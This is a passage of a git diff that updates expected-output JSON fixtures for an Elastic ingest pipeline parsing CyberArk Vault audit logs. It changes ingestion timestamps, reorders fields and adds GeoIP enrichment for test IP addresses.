Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -133,7 +133,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859787800Z", + "ingested": "2021-12-14T14:42:20.541747714Z", "original": "\u003c7\u003e1 2021-03-08T18:32:03Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:03\",\"IsoTimestamp\":\"2021-03-08T18:32:03Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansra\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -157,6 +157,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -200,7 +209,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859793400Z", + "ingested": "2021-12-14T14:42:20.541748227Z", "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", "code": "309", "kind": "event", @@ -224,6 +233,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -276,7 +294,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859798700Z", + "ingested": "2021-12-14T14:42:20.541753361Z", "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "309", "kind": "event", @@ -300,10 +318,28 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -352,7 +388,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859804100Z", + "ingested": "2021-12-14T14:42:20.541753835Z", "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "309", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json index bac89b31297..12d71010dbb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json @@ -72,7 +72,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:54.412027600Z", + "ingested": "2021-12-14T14:42:21.213593850Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e31\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=dbserver.cyberark.local;username=Administrator2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Version\":\"11.6.0000\",\"MessageID\":\"31\",\"Desc\":\"CPM Reconcile Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=dbserver.cyberark.local;username=Administrator2;\",\"Message\":\"CPM Reconcile Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "31", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json index 085f60f49b2..5dd2d2578cd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-12-09T13:36:54.557699900Z", + "ingested": "2021-12-14T14:42:21.407663529Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-12-09T13:36:54.557707500Z", + "ingested": "2021-12-14T14:42:21.407667723Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json index ace8cf5a812..ad4ef18a663 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-12-09T13:36:54.731499500Z", + "ingested": "2021-12-14T14:42:21.621527931Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-12-09T13:36:54.731508200Z", + "ingested": "2021-12-14T14:42:21.621533614Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json index 69f60d165d0..66f499030b5 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,14 +39,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "reset user password detailed information", - "ingested": "2021-12-09T13:36:54.898654500Z", + "ingested": "2021-12-14T14:42:21.833092350Z", "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", "code": "316", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json index 684015175d5..501ae3de9f9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,14 +38,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "reset user password", - "ingested": "2021-12-09T13:36:54.999436800Z", + "ingested": "2021-12-14T14:42:21.978940134Z", "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", "code": "317", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json index ff8d5d395f0..f948fbcd3f6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -52,7 +61,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101419Z", + "ingested": "2021-12-14T14:42:22.112533986Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Master\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -80,6 +89,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -124,7 +142,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101427Z", + "ingested": "2021-12-14T14:42:22.112536420Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 